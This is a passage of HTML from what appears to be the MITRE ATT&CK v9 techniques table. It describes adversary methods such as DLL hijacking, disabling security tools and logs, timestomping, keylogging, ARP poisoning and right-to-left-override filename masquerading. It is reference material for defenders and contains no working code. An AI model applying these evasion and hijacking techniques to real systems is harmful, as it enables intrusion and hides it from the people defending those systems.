href="/versions/v9/techniques/T1590/005"> IP Addresses </a> </td> <td> Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1590/006"> Network Security Appliances </a> </td> <td> Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1591"> T1591 </a> </td> <td> <a href="/versions/v9/techniques/T1591"> Gather Victim Org Information </a> </td> <td> Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1591/001"> Determine Physical Locations </a> </td> <td> Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1591/002"> Business Relationships </a> </td> <td> Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1591/003"> Identify Business Tempo </a> </td> <td> Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1591/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1591/004"> Identify Roles </a> </td> <td> Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1200"> T1200 </a> </td> <td> <a href="/versions/v9/techniques/T1200"> Hardware Additions </a> </td> <td> Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping , man-in-the middle encryption breaking , keystroke injection , kernel memory reading via DMA , adding new wireless access to an existing network , and others. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1564"> T1564 </a> </td> <td> <a href="/versions/v9/techniques/T1564"> Hide Artifacts </a> </td> <td> Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1564/001"> Hidden Files and Directories </a> </td> <td> Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1564/002"> Hidden Users </a> </td> <td> Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1564/003"> Hidden Window </a> </td> <td> Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1564/004"> NTFS File Attributes </a> </td> <td> Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1564/005"> Hidden File System </a> </td> <td> Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1564/006"> Run Virtual Instance </a> </td> <td> Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1564/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1564/007"> VBA Stomping </a> </td> <td> Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1574"> T1574 </a> </td> <td> <a href="/versions/v9/techniques/T1574"> Hijack Execution Flow </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1574/001"> DLL Search Order Hijacking </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1574/002"> DLL Side-Loading </a> </td> <td> Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to <a href="/versions/v9/techniques/T1574/001">DLL Search Order Hijacking</a>, side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1574/004"> Dylib Hijacking </a> </td> <td> Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1574/005"> Executable Installer File Permissions Weakness </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1574/006"> Dynamic Linker Hijacking </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1574/007"> Path Interception by PATH Environment Variable </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1574/008"> Path Interception by Search Order Hijacking </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1574/009"> Path Interception by Unquoted Path </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1574/010"> Services File Permissions Weakness </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1574/011"> Services Registry Permissions Weakness </a> </td> <td> Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, <a href="/versions/v9/techniques/T1059/001">PowerShell</a>, or <a href="/versions/v9/software/S0075">Reg</a>. Access to Registry keys is controlled through Access Control Lists and permissions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1574/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1574/012"> COR_PROFILER </a> </td> <td> Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1562"> T1562 </a> </td> <td> <a href="/versions/v9/techniques/T1562"> Impair Defenses </a> </td> <td> Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1562/001"> Disable or Modify Tools </a> </td> <td> Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1562/002"> Disable Windows Event Logging </a> </td> <td> Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more. This data is used by security tools and analysts to generate detections. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1562/003"> Impair Command History Logging </a> </td> <td> Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1562/004"> Disable or Modify System Firewall </a> </td> <td> Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1562/006"> Indicator Blocking </a> </td> <td> An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting or even disabling host-based sensors, such as Event Tracing for Windows (ETW), by tampering settings that control the collection and flow of event telemetry. These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as <a href="/versions/v9/techniques/T1059/001">PowerShell</a> or <a href="/versions/v9/techniques/T1047">Windows Management Instrumentation</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1562/007"> Disable or Modify Cloud Firewall </a> </td> <td> Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in <a href="/versions/v9/techniques/T1562/004">Disable or Modify System Firewall</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1562/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1562/008"> Disable Cloud Logs </a> </td> <td> An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1525"> T1525 </a> </td> <td> <a href="/versions/v9/techniques/T1525"> Implant Internal Image </a> </td> <td> Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike <a href="/versions/v9/techniques/T1608/001">Upload Malware</a>, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1070"> T1070 </a> </td> <td> <a href="/versions/v9/techniques/T1070"> Indicator Removal on Host </a> </td> <td> Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as <a href="/versions/v9/techniques/T1552/003">Bash History</a> and /var/log/*. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1070/001"> Clear Windows Event Logs </a> </td> <td> Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1070/002"> Clear Linux or Mac System Logs </a> </td> <td> Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as: </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1070/003"> Clear Command History </a> </td> <td> In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1070/004"> File Deletion </a> </td> <td> Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1070/005"> Network Share Connection Removal </a> </td> <td> Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and <a href="/versions/v9/techniques/T1021/002">SMB/Windows Admin Shares</a> connections can be removed when no longer needed. <a href="/versions/v9/software/S0039">Net</a> is an example utility that can be used to remove network share connections with the <code>net use \system\share /delete</code> command. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1070/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1070/006"> Timestomp </a> </td> <td> Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1202"> T1202 </a> </td> <td> <a href="/versions/v9/techniques/T1202"> Indirect Command Execution </a> </td> <td> Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking <a href="/versions/v9/software/S0106">cmd</a>. For example, <a href="/versions/v9/software/S0193">Forfiles</a>, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a <a href="/versions/v9/techniques/T1059">Command and Scripting Interpreter</a>, Run window, or via scripts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1105"> T1105 </a> </td> <td> <a href="/versions/v9/techniques/T1105"> Ingress Tool Transfer </a> </td> <td> Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1490"> T1490 </a> </td> <td> <a href="/versions/v9/techniques/T1490"> Inhibit System Recovery </a> </td> <td> Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of <a href="/versions/v9/techniques/T1485">Data Destruction</a> and <a href="/versions/v9/techniques/T1486">Data Encrypted for Impact</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1056"> T1056 </a> </td> <td> <a href="/versions/v9/techniques/T1056"> Input Capture </a> </td> <td> Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. <a href="/versions/v9/techniques/T1056/004">Credential API Hooking</a>) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. <a href="/versions/v9/techniques/T1056/003">Web Portal Capture</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1056/001"> Keylogging </a> </td> <td> Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when <a href="/versions/v9/techniques/T1003">OS Credential Dumping</a> efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1056/002"> GUI Input Capture </a> </td> <td> Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: <a href="/versions/v9/techniques/T1548/002">Bypass User Account Control</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1056/003"> Web Portal Capture </a> </td> <td> Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1056/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1056/004"> Credential API Hooking </a> </td> <td> Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials. Unlike <a href="/versions/v9/techniques/T1056/001">Keylogging</a>, this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1559"> T1559 </a> </td> <td> <a href="/versions/v9/techniques/T1559"> Inter-Process Communication </a> </td> <td> Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1559/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1559/001"> Component Object Model </a> </td> <td> Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1559/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1559/002"> Dynamic Data Exchange </a> </td> <td> Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1534"> T1534 </a> </td> <td> <a href="/versions/v9/techniques/T1534"> Internal Spearphishing </a> </td> <td> Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1570"> T1570 </a> </td> <td> <a href="/versions/v9/techniques/T1570"> Lateral Tool Transfer </a> </td> <td> Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with <a href="/versions/v9/techniques/T1021/002">SMB/Windows Admin Shares</a> or <a href="/versions/v9/techniques/T1021/001">Remote Desktop Protocol</a>. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1185"> T1185 </a> </td> <td> <a href="/versions/v9/techniques/T1185"> Man in the Browser </a> </td> <td> Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1557"> T1557 </a> </td> <td> <a href="/versions/v9/techniques/T1557"> Man-in-the-Middle </a> </td> <td> Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as <a href="/versions/v9/techniques/T1040">Network Sniffing</a> or <a href="/versions/v9/techniques/T1565/002">Transmitted Data Manipulation</a>. By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1557/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1557/001"> LLMNR/NBT-NS Poisoning and SMB Relay </a> </td> <td> By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1557/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1557/002"> ARP Cache Poisoning </a> </td> <td> Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as <a href="/versions/v9/techniques/T1040">Network Sniffing</a> or <a href="/versions/v9/techniques/T1565/002">Transmitted Data Manipulation</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1036"> T1036 </a> </td> <td> <a href="/versions/v9/techniques/T1036"> Masquerading </a> </td> <td> Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1036/001"> Invalid Code Signature </a> </td> <td> Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1036/002"> Right-to-Left Override </a> </td> <td> Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1036/003"> Rename System Utilities </a> </td> <td> Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). An alternative case occurs when a 